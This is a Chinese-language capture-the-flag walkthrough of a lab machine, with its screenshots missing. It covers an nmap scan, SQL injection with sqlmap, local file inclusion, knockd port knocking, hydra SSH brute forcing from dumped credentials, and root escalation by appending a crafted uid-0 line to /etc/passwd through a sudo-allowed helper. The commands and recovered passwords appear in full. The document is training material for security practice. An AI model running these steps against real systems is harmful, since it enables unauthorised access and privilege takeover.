nmap 扫描一下端口

image.png
image.png

在 web 的 search 界面找到一存在 sql 注入的页面,然后 sqlmap 跑出来 admin:transorbital1

image.png
image.png

在 manage 界面用 sqlmap 跑出来的用户名和密码登录,注意到下面有个 File does not exist,文件包含?

image.png
image.png

file 参数就能包含

image.png
image.png

burp 测出来的文件包含,注意那个 openSSH,他用了个叫 knockd 的软件,在连接 ssh 之前需要先“敲门”就是依次访问那些端口这样才能连接,这里是 7469,8475,9842

image.png
image.png

一开始 22 端口是关着的

image.png
image.png

可以用 knock -v 192.168.149.171 7469 8475 9842 来敲门
也可以 nmap 依次去扫描这些端口

image.png
image.png

这时候它的 22 端口已经打开了

image.png
image.png

可以使用之前 sqlmap 跑出来的那一些账户密码配合 hydra 爆破一波 ssh

写了个小脚本来把 sqlmap 跑出来的内容生成 user 和 password 的 txt 文件

1
2
3
4
5
6
7
8
9
10
# -*- coding: UTF-8 -*-
f=open('temp.txt',"r")
user=open("user.txt","a")
passwd=open("pass.txt","a")
for line in f:
    temp = line.replace(" ","")
    a=temp.split("|")
    print(a)
    user.write(a[2]+"\n")
    passwd.write(a[6]+"\n")
image.png
image.png

然后 hydra 爆破一波

hydra -L user.txt -w 10 -P pass.txt -t 10 -v 192.168.149.171 ssh

-L user.txt 指定爆破账号字典为 user.txt
-w 10 设置最大超时时间 10s,默认 30s
-P pass.txt 指定密码字典为 pass.txt
-t 10 指定爆破线程为 10 个
-v 指定显示爆破过程
-f 查找到第一个可以使用的账号和密码的时候停止破解

image.png
image.png

chandlerb:UrAG0D!
janitor:Ilovepeepee
joeyt:Passw0rd

登上以后 janitor:Ilovepeepee 存在隐藏文件
把这些密码保存出来再来一遍 hydra 爆破

image.png
image.png

又多出来一个 login:B4-Tru3-001

登录之后 sudo -l 发现有个这个东西

image.png
image.png

尝试执行以下结果发现有个提示:

image.png
image.png

在这个目录的上两层,发现了 test.py

image.png
image.png

当传入的参数是三个的时候(第一个就是文件本身了)可以把第二个参数给读出来然后写到第三个文件后面,而且他还是有 root 权限的,所以只要能够个 test 传入

生成 hash
openssl passwd -1 -salt yichen 123456

然后写到 /tmp/passwd
echo ‘yichen:$1$yichen$6nzFZVX5T21iu2AmBgzin/:0:0:yichen:/root:/bin/bash’ > /tmp/passwd

运行 sudo /opt/devstuff/dist/test/test /tmp/passwd /etc/passwd
就会把我们写在 /tmp/passwd 的内容写到 /etc/passwd

这时候只需要 su yichen,输入密码:123456,就拥有了 root 权限

image.png
image.png
image.png
image.png